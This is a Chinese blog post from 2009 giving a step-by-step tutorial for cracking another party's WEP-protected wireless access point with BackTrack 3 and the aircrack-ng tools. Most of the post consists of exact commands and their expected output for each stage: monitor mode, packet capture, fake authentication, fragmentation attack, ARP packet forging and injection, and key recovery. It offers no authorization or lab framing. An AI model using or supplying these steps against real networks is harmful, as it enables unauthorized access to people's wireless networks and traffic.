BT3下破解无线客户端wep简明教程

来源:蓝海星雨

1.接上篇教程,下载 安装(或刻盘)BT3后,在BT3下直接破解无线客户端。现教程奉上.

2.启动BT3,打开一个窗口,输入ifconfig –a 查看网卡 (顺便记下自己网卡的mac,后面要用到)

我的网卡是rausb0

再输入ifconfig –a rausb0加载usb网卡驱动

3.输入airmon-ng start rausb0 6 激活网卡的Monitor模式

后面的6 是你要破解ap 的工作频道 根据实际,换成你破解的ap的实际工作频道(下同)

1.jpg 大小: 61.96 K 尺寸: 500 x 206 浏览: 44 次 点击打开新窗口浏览全图

4.输入抓包命令,抓包并查看你要破解的ap的essid mac

输入命令 airodump-ng --ivs -w name -c 6 rausb0 ,其中,rausb0是你破解用的网卡接口名(下同),这样,你的窗口将显示一个工作站,可以看到你要破解的ap的essid 和mac ,并记下ap的essid 和mac。

 

2.jpg 大小: 94.99 K 尺寸: 500 x 206 浏览: 27 次 点击打开新窗口浏览全图

5.上面窗口不关闭,另开一个窗口,输入命令,用自己的网卡连接要破解的ap

输入 aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac rausb0

这时,系统将回显

Sending Authentication Request

Authentication successful

Sending Association Request Association successful :-)

 

3.jpg 大小: 85.84 K 尺寸: 500 x 244 浏览: 21 次 点击打开新窗口浏览全图

6.输入aireplay-ng -5 -b ap的mac -h 自己网卡的mac rausb0 来获得xor文件

4.jpg 大小: 118.17 K 尺寸: 500 x 331 浏览: 14 次 点击打开新窗口浏览全图

如果一切顺利,系统将回显 Use this packet ?

输入y 回车,将得到一个至关重要的xor文件。

5.jpg 大小: 158.8 K 尺寸: 500 x 403 浏览: 15 次 点击打开新窗口浏览全图

再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。

6.jpg 大小: 167.98 K 尺寸: 500 x 348 浏览: 13 次 点击打开新窗口浏览全图

7.输入packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp

其中,–l中的l是L的小写,别和1混淆,而其中的××××-××××.xor 是你刚才生成的文件名。

7.jpg 大小: 173.97 K 尺寸: 500 x 313 浏览: 15 次 点击打开新窗口浏览全图

系统回显:Wrote packet to: mrarp

8.输入aireplay-ng -2 –r mrarp -x 1024 rausb0 ,发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,我选择的是1024。

 

8.jpg 大小: 214.93 K 尺寸: 500 x 375 浏览: 16 次 点击打开新窗口浏览全图

输入y 回车 攻击开始

9.jpg 大小: 206.43 K 尺寸: 500 x 375 浏览: 15 次 点击打开新窗口浏览全图

这时,前面的抓包窗口上的data将迅速增加。

10.jpg 大小: 117.57 K 尺寸: 500 x 243 浏览: 16 次 点击打开新窗口浏览全图

到数据增加到3万以上时,另开窗口,启动  aircrack-ng -n 64 -b ap的mac name-01.ivs

其中 64 是64位密码,如果是128位,换成128即可。

11.jpg 大小: 191.21 K 尺寸: 500 x 375 浏览: 48 次 点击打开新窗口浏览全图

完成, 以上~~ 即 WEP密码~~ :)
 

Posted on: 2009, February 10, 6:16 PM | Filed under: 常用工具 |
Tags:tools

您可能会对以下文章感兴趣哦

Leave a comment

Your comment

Why not Login? Sign up now! »